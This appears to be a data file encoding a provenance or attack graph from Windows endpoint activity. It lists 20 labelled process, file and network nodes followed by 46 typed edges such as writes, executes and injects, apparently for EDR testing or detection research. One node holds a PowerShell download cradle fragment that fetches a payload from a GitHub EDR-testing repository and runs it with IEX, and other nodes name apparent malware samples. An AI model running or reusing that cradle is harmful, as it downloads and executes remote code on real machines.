20
MP*-setup.exe 
MF-\users\public\music\allthethingsx64.dll
TF-\Users\admin\AppData\Local\Microsoft\Windows\675C164A48CAABAED03C522F8DB787B373FB4DE2.exe
MP*-ns9EC8.tmp 
TP-CareUEyes_setup.exe
MP*-EXCEL.EXE
MP-jww825a.tmp
MP-MicrosoftEdgeUpdate.exe 
MP-installd.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TF-c:\Users\admin\AppData\Local\Temp\CSCF2B3
MP-fd4289d63cda962af120a59a1f3a389f.exe.vir.exe 
MP-Regasm.exe
MF-C:\Users\admin\Desktop\what
MF-C:\Program files\30802
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test
SF-C:\Users\admin\AppData\Local\Temp\ycard.mp4
MP-HxDSetup.exe 
MP*-LZ4-SOFT.exe 
MF-Files\Microsoft\Edge\Application\109.0.1518.115\BHO\ie_to_edge_stub.exe
46
0 1 WR
0 2 WR
0 3 FR
3 1 WR
3 2 EX
0 4 FR
4 1 WR
4 2 EX
3 4 IJ
0 5 FR
5 1 WR
5 2 WR
4 5 IJ
0 6 FR
6 1 CD
6 2 RD
3 6 UK
0 7 FR
7 1 RD
7 2 EX
4 7 UK
0 8 FR
8 1 UK
9 0 RF
5 9 ST
0 10 WR
5 10 RD
11 2 RD
5 11 UK
12 2 RD
9 12 RF
12 10 WR
12 13 RD
12 14 WR
12 15 ST
12 16 WR
17 9 ST
17 10 WR
12 17 UK
18 9 ST
18 10 WR
18 13 RD
18 14 WR
18 15 ST
18 16 WR
18 19 UK

